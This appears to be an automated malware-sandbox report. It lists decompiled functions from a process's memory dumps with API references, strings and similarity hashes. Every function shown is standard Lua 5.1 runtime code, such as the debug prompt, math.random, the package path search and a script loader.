Instruction ID: 5b255e77e8ec04b713b26f643ab9b2728369514ed90db6555c98430134d4c24b
Opcode Fuzzy Hash: d7e85bc8049e4060eca9a77a84cae6b6faed82dd468bf8e4a64dc6b551f185ea
Instruction Fuzzy Hash: 5B3126FA90561527D202CA246C42FAF768DCF821D9F040225F8049D183FA36FAB641BB

Uniqueness

Uniqueness Score: -1.00%

Function 10011BC0, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011BC0(intOrPtr _a4) {
				char _v252;
				char* _t12;
				intOrPtr* _t14;
				void* _t17;
				char* _t25;
				void* _t26;
				intOrPtr _t27;
				signed int _t29;
				signed int _t37;
				signed int _t41;
				intOrPtr* _t43;
				char* _t46;
				char* _t47;
				char* _t49;

				fputs("lua_debug> ", __imp___iob + 0x40);
				_t12 = fgets( &_v252, 0xfa, __imp___iob);
				_t46 =  &(( &_v252)[0x14]);
				if(_t12 != 0) {
					_t27 = _a4;
					do {
						_t43 = "cont\n";
						_t14 =  &_v252;
						while(1) {
							_t37 =  *_t14;
							_t29 = _t37;
							if(_t37 !=  *_t43) {
								break;
							}
							if(_t29 == 0) {
								L7:
								_t14 = 0;
							} else {
								_t41 =  *((intOrPtr*)(_t14 + 1));
								_t29 = _t41;
								if(_t41 !=  *((intOrPtr*)(_t43 + 1))) {
									break;
								} else {
									_t14 = _t14 + 2;
									_t43 = _t43 + 2;
									if(_t29 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t14 != 0) {
								asm("repne scasb");
								_t17 = E1000FFE0(_t27,  &_v252,  !(_t29 | 0xffffffff) - 1, "=(debug command)");
								_t47 =  &(_t46[0x10]);
								if(_t17 != 0) {
									L12:
									fputs(E100016F0(_t57, _t27, 0xffffffff, 0), __imp___iob + 0x40);
									fputs("\n", __imp___iob + 0x40);
									_t49 =  &(_t47[0x1c]);
								} else {
									_t26 = E100020B0(_t27, _t17, _t17, _t17);
									_t49 =  &(_t47[0x10]);
									_t57 = _t26;
									if(_t26 != 0) {
										goto L12;
									}
								}
								goto L13;
							}
							goto L14;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
						L13:
						E10001160(_t27, 0);
						fputs("lua_debug> ", __imp___iob + 0x40);
						_t25 = fgets( &_v252, 0xfa, __imp___iob);
						_t46 =  &(_t49[0x1c]);
					} while (_t25 != 0);
				}
				L14:
				return 0;
			}

0x10011bde
0x10011bf1
0x10011bf7
0x10011bfc
0x10011c02
0x10011c09
0x10011c09
0x10011c0e
0x10011c12
0x10011c12
0x10011c14
0x10011c18
0x00000000
0x00000000
0x10011c1c
0x10011c32
0x10011c32
0x10011c1e
0x10011c1e
0x10011c21
0x10011c26
0x00000000
0x10011c28
0x10011c28
0x10011c2b
0x10011c30
0x00000000
0x00000000
0x00000000
0x00000000
0x10011c30
0x10011c26
0x10011c3b
0x10011c3d
0x10011c51
0x10011c5d
0x10011c62
0x10011c67
0x10011c79
0x10011c91
0x10011ca2
0x10011ca4
0x10011c69
0x10011c6d
0x10011c72
0x10011c75
0x10011c77
0x00000000
0x00000000
0x10011c77
0x00000000
0x10011c67
0x00000000
0x10011c3d
0x10011c36
0x10011c38
0x00000000
0x10011ca7
0x10011caa
0x10011cbd
0x10011cd0
0x10011cd6
0x10011cd9
0x10011c09
0x10011ce4
0x10011ced

APIs

fputs.MSVCRT ref: 10011BDE
fgets.MSVCRT ref: 10011BF1
luaL_loadbuffer.LUA5.1(?,?,?,=(debug command)), ref: 10011C5D
lua_pcall.LUA5.1(?,00000000,00000000,00000000), ref: 10011C6D
lua_tolstring.LUA5.1(?,000000FF,00000000,759745C0), ref: 10011C88
fputs.MSVCRT ref: 10011C91
fputs.MSVCRT ref: 10011CA2
lua_settop.LUA5.1(?,00000000), ref: 10011CAA
fputs.MSVCRT ref: 10011CBD
fgets.MSVCRT ref: 10011CD0

Strings

cont, xrefs: 10011C09
lua_debug> , xrefs: 10011BD9, 10011CB8
=(debug command), xrefs: 10011C4C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: fputs$fgets$L_loadbuffer.lua_pcall.lua_settop.lua_tolstring.
String ID: =(debug command)$cont$lua_debug>
API String ID: 496144354-3721951588
Opcode ID: 588ae5eca8523f5725b35548e8d21325bece9f8a646893c0fcda5f2a817e0c63
Instruction ID: dd15bfc192eda74ecd1c27d1dc96f8bcf05885e36f6e9186d248232a4aa7a0df
Opcode Fuzzy Hash: 588ae5eca8523f5725b35548e8d21325bece9f8a646893c0fcda5f2a817e0c63
Instruction Fuzzy Hash: 663126B5540346ABF318CB349C82FF333EDFB45294F018654FA998A2C2EA31F94482A5

Uniqueness

Uniqueness Score: -1.00%

Function 100133B0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E100133B0(void* __eflags, signed int __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t15;
				void* _t17;
				void* _t18;
				void* _t22;
				intOrPtr _t23;
				void* _t30;
				intOrPtr _t32;
				void* _t39;
				intOrPtr _t44;
				signed int _t47;
				signed long long* _t50;
				signed long long* _t52;
				signed long long* _t53;
				signed long long _t60;
				signed long long _t61;
				signed long long _t63;

				_push(_t30);
				_t15 = rand();
				asm("cdq");
				_t44 = _a4;
				_v20 = _t15 % 0x7fff;
				asm("fild dword [esp+0x14]");
				_t60 = __fp0 *  *0x100178c0;
				_v12 = _t60;
				_t17 = E10001150(_t44);
				_t50 = (_t47 & 0xfffffff8) - 0x14 + 4;
				_t18 = _t17;
				if(_t18 == 0) {
					_push(_v8);
					_push(_v12);
					goto L11;
				} else {
					_t22 = _t18 - 1;
					if(_t22 == 0) {
						_t23 = E1000F5C0(__eflags, _t60, _t44, 1);
						_t52 =  &(_t50[1]);
						__eflags = _t23 - 1;
						_v16 = _t23;
						if(__eflags < 0) {
							E1000F090(_t30, _t44, __eflags, _t44, 1, "interval is empty");
							_t52 =  &(_t52[1]);
						}
						asm("fild dword [esp+0x14]");
						_t50 = _t52 - 8;
						_t61 = _t60 * _v12;
						 *_t50 = _t61;
						__imp__floor();
						 *_t50 = _t61 +  *0x10017488;
						goto L11;
					} else {
						if(_t22 == 1) {
							_t32 = E1000F5C0(__eflags, _t60, _t44, 1);
							_v16 = _t32;
							_t39 = E1000F5C0(__eflags, _t60, _t44, 2);
							_t53 =  &(_t50[2]);
							__eflags = _t32 - _t39;
							if(__eflags > 0) {
								E1000F090(_t32, _t44, __eflags, _t44, 2, "interval is empty");
								_t53 =  &(_t53[1]);
							}
							_t50 = _t53 - 8;
							_v20 = _t39 - _t32 + 1;
							asm("fild dword [esp+0x18]");
							_t63 = _t60 * _v12;
							 *_t50 = _t63;
							__imp__floor();
							asm("fiadd dword [esp+0x1c]");
							 *_t50 = _t63;
							L11:
							_push(_t44);
							E100018E0();
							return 1;
						} else {
							_push("wrong number of arguments");
							_push(_t44);
							return E1000F230();
						}
					}
				}
			}

0x100133b9
0x100133bc
0x100133c2
0x100133c8
0x100133ce
0x100133d2
0x100133d6
0x100133dc
0x100133e0
0x100133e5
0x100133e8
0x100133eb
0x100134aa
0x100134ab
0x00000000
0x100133f1
0x100133f1
0x100133f2
0x10013462
0x10013467
0x1001346a
0x1001346d
0x10013471
0x1001347b
0x10013480
0x10013480
0x10013483
0x10013487
0x1001348a
0x1001348e
0x10013491
0x1001349d
0x00000000
0x100133f4
0x100133f5
0x10013414
0x10013419
0x10013422
0x10013424
0x10013427
0x10013429
0x10013433
0x10013438
0x10013438
0x1001343d
0x10013441
0x10013445
0x10013449
0x1001344d
0x10013450
0x10013456
0x1001345a
0x100134ac
0x100134ac
0x100134ad
0x100134c0
0x100133f7
0x100133f7
0x100133fc
0x1001340b
0x1001340b
0x100133f5
0x100133f2

APIs

rand.MSVCRT ref: 100133BC
lua_gettop.LUA5.1(?), ref: 100133E0
luaL_error.LUA5.1(?,wrong number of arguments), ref: 100133FD

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

luaL_checkinteger.LUA5.1(?,00000001), ref: 1001340F
luaL_checkinteger.LUA5.1(?,00000002,?,00000001), ref: 1001341D
luaL_argerror.LUA5.1(?,00000002,interval is empty), ref: 10013433
floor.MSVCRT ref: 10013450
luaL_checkinteger.LUA5.1(?,00000001), ref: 10013462
luaL_argerror.LUA5.1(?,00000001,interval is empty), ref: 1001347B
floor.MSVCRT ref: 10013491
lua_pushnumber.LUA5.1(?,?,?), ref: 100134AD

Strings

interval is empty, xrefs: 1001342B, 10013473
wrong number of arguments, xrefs: 100133F7

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkinteger.$L_argerror.floor$L_error.L_where.lua_concat.lua_error.lua_gettop.lua_pushnumber.lua_pushvfstring.rand
String ID: interval is empty$wrong number of arguments
API String ID: 252998509-2060003781
Opcode ID: 893e94d1bea3f3850c278cbecdf344832d0b7c5ab6799491603f2278ee0dbb40
Instruction ID: 900148f895d8da72e75da7c1b250d4fead81e5aa23b2c00703922eb8c7280d23
Opcode Fuzzy Hash: 893e94d1bea3f3850c278cbecdf344832d0b7c5ab6799491603f2278ee0dbb40
Instruction Fuzzy Hash: 88212B31918710DBE301EF24EC466AE7BE8FF81354F008529F5C596182EA71EAA583E7

Uniqueness

Uniqueness Score: -1.00%

Function 100163F0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100163F0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t14;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t32;
				void* _t33;

				_t33 = __eflags;
				_t23 = __ecx;
				_t26 = _a4;
				_t5 = E1000F840(__ecx, _a4, _a8, ".", "\\");
				_t21 = _a12;
				_t27 = _t5;
				E10001B90(__ecx, _t33, _t26, 0xffffd8ef, _a12);
				_t24 = E100016F0(_t33, _t26, 0xffffffff, 0);
				_t29 = _t28 + 0x28;
				if(_t7 == 0) {
					E1000F230(_t26, "\'package.%s\' must be a string", _t21);
					_t29 = _t29 + 0xc;
				}
				E10001930(_t26, 0x1001ab10, 0);
				_t22 = E10016500(_t26, _t24);
				_t30 = _t29 + 0x14;
				_t35 = _t22;
				if(_t22 == 0) {
					L5:
					return 0;
				} else {
					while(1) {
						_t25 = E1000F840(_t23, _t26, E100016F0(_t35, _t26, 0xffffffff, 0), "?", _t27);
						E100011B0(_t35, _t26, 0xfffffffe);
						_t14 = E100164D0(_t25);
						_t32 = _t30 + 0x28;
						_t36 = _t14;
						if(_t14 != 0) {
							break;
						}
						E100019F0(_t26, "\n\tno file \'%s\'", _t25);
						E100011B0(_t36, _t26, 0xfffffffe);
						E100023C0(_t26, 2);
						_t22 = E10016500(_t26, _t22);
						_t30 = _t32 + 0x24;
						if(_t19 != 0) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return _t25;
				}
				L7:
			}

0x100163f0
0x100163f0
0x100163f7
0x10016408
0x1001640d
0x10016411
0x1001641a
0x10016429
0x1001642b
0x10016430
0x10016439
0x1001643e
0x1001643e
0x10016449
0x10016455
0x10016457
0x1001645a
0x1001645c
0x100164be
0x100164c1
0x1001645e
0x1001645e
0x1001647b
0x1001647d
0x10016483
0x10016488
0x1001648b
0x1001648d
0x00000000
0x00000000
0x10016496
0x1001649e
0x100164a6
0x100164b2
0x100164b4
0x100164b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100164b9
0x100164c8
0x100164c8
0x00000000

APIs

luaL_gsub.LUA5.1(?,?,1001939C,1001A8F0,?,?,?,?,100163BC,?,00000000,path,?,00000001,00000000), ref: 10016408

Part of subcall function 1000F840: luaL_buffinit.LUA5.1(?,?), ref: 1000F86C
Part of subcall function 1000F840: strstr.MSVCRT ref: 1000F87A
Part of subcall function 1000F840: luaL_addlstring.LUA5.1(?,?,00000000), ref: 1000F894
Part of subcall function 1000F840: luaL_addstring.LUA5.1(?,?,?,?,00000000), ref: 1000F8A6
Part of subcall function 1000F840: strstr.MSVCRT ref: 1000F8B0
Part of subcall function 1000F840: luaL_addstring.LUA5.1(?,?), ref: 1000F8C5
Part of subcall function 1000F840: luaL_pushresult.LUA5.1(?,?,?), ref: 1000F8CF
Part of subcall function 1000F840: lua_tolstring.LUA5.1(?,000000FF,00000000,?,?,?), ref: 1000F8E0

lua_getfield.LUA5.1(?,FFFFD8EF,?,?,?,1001939C,1001A8F0,?,?,?,?,100163BC,?,00000000,path,?), ref: 1001641A

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_tolstring.LUA5.1(?,000000FF,00000000,?,FFFFD8EF,?,?,?,1001939C,1001A8F0,?,?,?,?,100163BC,?), ref: 10016424
luaL_error.LUA5.1(?,'package.%s' must be a string,?), ref: 10016439

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_pushlstring.LUA5.1(?,1001AB10,00000000), ref: 10016449
lua_tolstring.LUA5.1(?,000000FF,00000000,10019034,00000000), ref: 10016469
luaL_gsub.LUA5.1(?,00000000,?,10019034,00000000), ref: 10016473
lua_remove.LUA5.1(?,000000FE,?,00000000,?,10019034,00000000), ref: 1001647D
lua_pushfstring.LUA5.1(?,no file '%s',00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 10016496
lua_remove.LUA5.1(?,000000FE,?,no file '%s',00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001649E
lua_concat.LUA5.1(?,00000002,?,000000FE,?,no file '%s',00000000), ref: 100164A6

Strings

'package.%s' must be a string, xrefs: 10016433
no file '%s', xrefs: 10016490

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_tolstring.$L_addstring.L_gsub.lua_concat.lua_remove.strstr$L_addlstring.L_buffinit.L_error.L_pushresult.L_where.S_newlstr.lua_error.lua_getfield.lua_pushfstring.lua_pushlstring.lua_pushvfstring.
String ID: no file '%s'$'package.%s' must be a string
API String ID: 484101349-3979748282
Opcode ID: 2d5474ebd45e96a175c4364572e84b5dcdea676b8dc3adb95eeffef36c7b2672
Instruction ID: ec2732b1719a14bd356e6ea88359e8bd456c67a1c8f05426e50088886b804c68
Opcode Fuzzy Hash: 2d5474ebd45e96a175c4364572e84b5dcdea676b8dc3adb95eeffef36c7b2672
Instruction Fuzzy Hash: 4411827960562237E501E1A55C82FEF219DCF8A1F4F154234FA14B9187EF69FA8301BA

Uniqueness

Uniqueness Score: -1.00%

Function 00A23A10, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00A23A10(int __eax, intOrPtr _a4) {
				int _v4;
				int _t5;
				void* _t8;
				void* _t10;
				intOrPtr _t11;
				void* _t12;
				void* _t13;
				void* _t14;

				_t5 = __eax;
				_t11 = _a4;
				_push(1);
				_push(_t11);
				L00A23F0E();
				_t8 = __eax;
				_t13 = _t12 + 8;
				if(__eax == 0) {
					_push("userdata, or light userdata");
					_push(1);
					_push(_t11);
					L00A23FEC();
					_t13 = _t13 + 0xc;
				}
				_push(2);
				_push(_t11);
				L00A23F50();
				_t14 = _t13 + 8;
				if(_t5 == 0) {
					_push(2);
					_push(_t11);
					L00A23F56();
					_t14 = _t14 + 8;
					if(_t5 == 0) {
						_push("string, userdata, or light userdata");
						_push(2);
						_push(_t11);
						L00A23FEC();
						_t14 = _t14 + 0xc;
					}
				}
				_push(2);
				_push(_t11);
				L00A23F50();
				if(_t5 == 0) {
					_t5 =  &_v4;
					_push(_t5);
					_push(2);
					_push(_t11);
					L00A23F5C();
					_push(_v4);
					_push(3);
					_push(_t11);
					_t10 = _t5;
					L00A23FC2();
				} else {
					_push(2);
					_push(_t11);
					L00A23F0E();
					_push(3);
					_push(_t11);
					_t10 = _t5;
					L00A23FCE();
				}
				_v4 = _t5;
				if(_t5 > 0) {
					memcpy(_t8, _t10, _t5);
				}
				return 0;
			}

0x00a23a10
0x00a23a13
0x00a23a18
0x00a23a1a
0x00a23a1b
0x00a23a20
0x00a23a22
0x00a23a27
0x00a23a29
0x00a23a2e
0x00a23a30
0x00a23a31
0x00a23a36
0x00a23a36
0x00a23a39
0x00a23a3b
0x00a23a3c
0x00a23a41
0x00a23a46
0x00a23a48
0x00a23a4a
0x00a23a4b
0x00a23a50
0x00a23a55
0x00a23a57
0x00a23a5c
0x00a23a5e
0x00a23a5f
0x00a23a64
0x00a23a64
0x00a23a55
0x00a23a67
0x00a23a69
0x00a23a6a
0x00a23a74
0x00a23a8d
0x00a23a91
0x00a23a92
0x00a23a94
0x00a23a95
0x00a23a9e
0x00a23a9f
0x00a23aa1
0x00a23aa2
0x00a23aa4
0x00a23a76
0x00a23a76
0x00a23a78
0x00a23a79
0x00a23a7e
0x00a23a80
0x00a23a81
0x00a23a83
0x00a23a88
0x00a23aae
0x00a23ab2
0x00a23ab7
0x00a23abc
0x00a23ac5

APIs

lua_touserdata.LUA5.1(?,00000001), ref: 00A23A1B
luaL_typerror.LUA5.1(?,00000001,userdata, or light userdata), ref: 00A23A31
lua_isuserdata.LUA5.1(?,00000002), ref: 00A23A3C
lua_isstring.LUA5.1(?,00000002), ref: 00A23A4B
luaL_typerror.LUA5.1(?,00000002,string, userdata, or light userdata), ref: 00A23A5F
lua_isuserdata.LUA5.1(?,00000002), ref: 00A23A6A
lua_touserdata.LUA5.1(?,00000002), ref: 00A23A79
luaL_checkinteger.LUA5.1(?,00000003,?,00000002), ref: 00A23A83
lua_tolstring.LUA5.1(?,00000002,?), ref: 00A23A95
luaL_optinteger.LUA5.1(?,00000003,?,?,00000002,?), ref: 00A23AA4
memcpy.MSVCR80 ref: 00A23AB7

Strings

string, userdata, or light userdata, xrefs: 00A23A57
userdata, or light userdata, xrefs: 00A23A29

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_typerror.lua_isuserdata.lua_touserdata.$L_checkinteger.L_optinteger.lua_isstring.lua_tolstring.memcpy
String ID: string, userdata, or light userdata$userdata, or light userdata
API String ID: 3077330360-2380118492
Opcode ID: f196f44e6f2e611d626525350514affadc4b4683eeebca2f19bd86078b03596c
Instruction ID: 6e51b2452d5a5aa9314cc5bd1b968fa626d3085f575721558eedd1ea3d4a4ca6
Opcode Fuzzy Hash: f196f44e6f2e611d626525350514affadc4b4683eeebca2f19bd86078b03596c
Instruction Fuzzy Hash: 6211C263E5133036EE20B63D7F07F6B21AC5F63740F040438F904A9182F6AEDB0541A2

Uniqueness

Uniqueness Score: -1.00%

Function 00401230, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00401230(char* __eax, void* __esi) {
				void* _t4;
				void* _t6;
				intOrPtr* _t7;
				void* _t11;
				void* _t12;
				void* _t15;
				void* _t16;
				void* _t20;

				_t11 = __esi;
				_t1 = __eax;
				_push(__eax);
				_push(__esi);
				L00401F66();
				_t16 = _t15 + 8;
				if(__eax != 0) {
					L3:
					_push(0xffffffff);
					_push(_t11);
					L00401F4E();
					if(_t1 != 0) {
						_push(0);
						_push(0xffffffff);
						_push(_t11);
						L00401F36();
						if(_t1 == 0) {
							_t1 = "(error object is not a string)";
						}
						E00401060(_t1);
						_push(0xfffffffe);
						_push(_t11);
						L00401F0C();
					}
					return 1;
				} else {
					L00401F00();
					L00401F5A();
					L00401F06();
					_t7 = __imp__signal;
					_t4 =  *_t7(2, E00401030, __esi, __eax, __esi, E004010B0, 0, __esi, _t12, _t6);
					L00401F60();
					_t1 =  *_t7(2, 0, __esi, 0, 0, __eax);
					_push(__eax);
					_push(__esi);
					L00401F7E();
					_t20 = _t16 + 0x40;
					if(_t4 == 0) {
						return 0;
					} else {
						_push(0);
						_push(2);
						_push(__esi);
						L00401ED6();
						_t16 = _t20 + 0xc;
						goto L3;
					}
				}
			}

0x00401230
0x00401230
0x00401231
0x00401232
0x00401233
0x00401238
0x0040123d
0x0040129c
0x0040129c
0x0040129e
0x004012a4
0x004012ae
0x004012b0
0x004012b2
0x004012b4
0x004012b5
0x004012bf
0x004012c1
0x004012c1
0x004012cc
0x004012d1
0x004012d3
0x004012d4
0x004012d9
0x004012df
0x0040123f
0x00401242
0x00401251
0x00401258
0x0040125d
0x0040126a
0x00401272
0x0040127d
0x0040127f
0x00401280
0x00401281
0x00401286
0x0040128d
0x004012e3
0x0040128f
0x0040128f
0x00401291
0x00401293
0x00401294
0x00401299
0x00000000
0x00401299
0x0040128d

APIs

luaL_loadfile.LUA5.1 ref: 00401233
lua_gettop.LUA5.1 ref: 00401242
lua_pushcclosure.LUA5.1(?,Function_000010B0,00000000), ref: 00401251
lua_insert.LUA5.1(?,00000000,?,Function_000010B0,00000000), ref: 00401258
signal.MSVCR80 ref: 0040126A
lua_pcall.LUA5.1(?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401272
signal.MSVCR80 ref: 0040127D
lua_remove.LUA5.1(?,00000000,?,00000000,00000000,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401281
lua_gc.LUA5.1(?,00000002,00000000), ref: 00401294
lua_type.LUA5.1(?,000000FF), ref: 004012A4
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 004012B5
lua_settop.LUA5.1(?,000000FE,00000000), ref: 004012D4

Strings

(error object is not a string), xrefs: 004012C1, 004012C6

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: signal$L_loadfile.lua_gc.lua_gettop.lua_insert.lua_pcall.lua_pushcclosure.lua_remove.lua_settop.lua_tolstring.lua_type.
String ID: (error object is not a string)
API String ID: 1065406996-1990977736
Opcode ID: a9d10e1131125620e8125551ceb34321ec4c2048afaafac1bac3101178478327
Instruction ID: 609089661e421deb50f08e59b38932f62a38838d93456669bdb35b7bb1a0a8a5
Opcode Fuzzy Hash: a9d10e1131125620e8125551ceb34321ec4c2048afaafac1bac3101178478327
Instruction Fuzzy Hash: 8811967274521636E52132766C03F5B224C4F927A9F24027FFA14F52E6FBBDAA0140BE

Uniqueness

Uniqueness Score: -1.00%

Function 10010470, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E10010470(void* __ebx, void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				char _v100;
				void* __esi;
				void* _t5;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				void* _t16;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				void* _t24;

				_t16 = __ebx;
				_t20 = _a4;
				_t5 = E10001410(__eflags, _t20, 1);
				_t22 =  &_v100 + 8;
				_t29 = _t5 - 6;
				if(_t5 != 6) {
					_push(1);
					__eflags = _a8;
					if(__eflags == 0) {
						_push(_t20);
						_t7 = E1000F5C0(__eflags, __fp0);
						_t23 = _t22 + 8;
					} else {
						_push(1);
						_push(_t20);
						_t7 = E1000F600(__eflags, __fp0);
						_t23 = _t22 + 0xc;
					}
					_t19 = _t7;
					__eflags = _t7;
					if(__eflags < 0) {
						E1000F090(_t16, _t20, __eflags, _t20, 1, "level must be non-negative");
						_t23 = _t23 + 0xc;
					}
					_t9 = E10003F40(_t20, _t19,  &_v100);
					_t24 = _t23 + 0xc;
					__eflags = _t9;
					if(__eflags == 0) {
						E1000F090(_t16, _t20, __eflags, _t20, 1, "invalid level");
						_t24 = _t24 + 0xc;
					}
					E10004130(_t20, "f",  &_v100);
					_t11 = E10001410(__eflags, _t20, 0xffffffff);
					__eflags = _t11;
					if(_t11 == 0) {
						return E1000F230(_t20, "no function environment for tail call at level %d", _t19);
					}
					return _t11;
				} else {
					return E100013D0(_t29, _t20, 1);
				}
			}

0x10010470
0x10010474
0x1001047c
0x10010481
0x10010484
0x10010487
0x1001049e
0x100104a0
0x100104a2
0x100104b1
0x100104b2
0x100104b7
0x100104a4
0x100104a4
0x100104a6
0x100104a7
0x100104ac
0x100104ac
0x100104ba
0x100104bc
0x100104be
0x100104c8
0x100104cd
0x100104cd
0x100104d7
0x100104dc
0x100104df
0x100104e1
0x100104eb
0x100104f0
0x100104f0
0x100104fe
0x10010506
0x1001050e
0x10010510
0x00000000
0x1001051e
0x10010526
0x10010489
0x10010499
0x10010499

APIs

lua_type.LUA5.1(?,00000001,?,?), ref: 1001047C
lua_pushvalue.LUA5.1(?,00000001,?,?), ref: 1001048C
luaL_optinteger.LUA5.1(?,00000001,00000001,?,?), ref: 100104A7
luaL_argerror.LUA5.1(?,00000001,level must be non-negative,?,?,?,?), ref: 100104C8
lua_getstack.LUA5.1(?,00000000,?,?,?,?,?), ref: 100104D7
luaL_argerror.LUA5.1(?,00000001,invalid level,?,?,?,?,?,?,?), ref: 100104EB
lua_getinfo.LUA5.1(?,10019DE0,?,?,?,?,?,?,?,?), ref: 100104FE
lua_type.LUA5.1(?,000000FF,?,10019DE0,?,?,?,?,?,?,?,?), ref: 10010506
luaL_error.LUA5.1(?,no function environment for tail call at level %d,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10010519

Strings

no function environment for tail call at level %d, xrefs: 10010513
invalid level, xrefs: 100104E3
level must be non-negative, xrefs: 100104C0

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.lua_type.$L_error.L_optinteger.lua_getinfo.lua_getstack.lua_pushvalue.
String ID: invalid level$level must be non-negative$no function environment for tail call at level %d
API String ID: 2520475139-666454301
Opcode ID: 3c3b0dba6d6906cf0e8e271301f92da2a83eee23d37a91dc1502aed2cce9eadf
Instruction ID: e862c6dc223d550a73eb607c452ed5feadd38fb641434d4ab946053b96478e46
Opcode Fuzzy Hash: 3c3b0dba6d6906cf0e8e271301f92da2a83eee23d37a91dc1502aed2cce9eadf
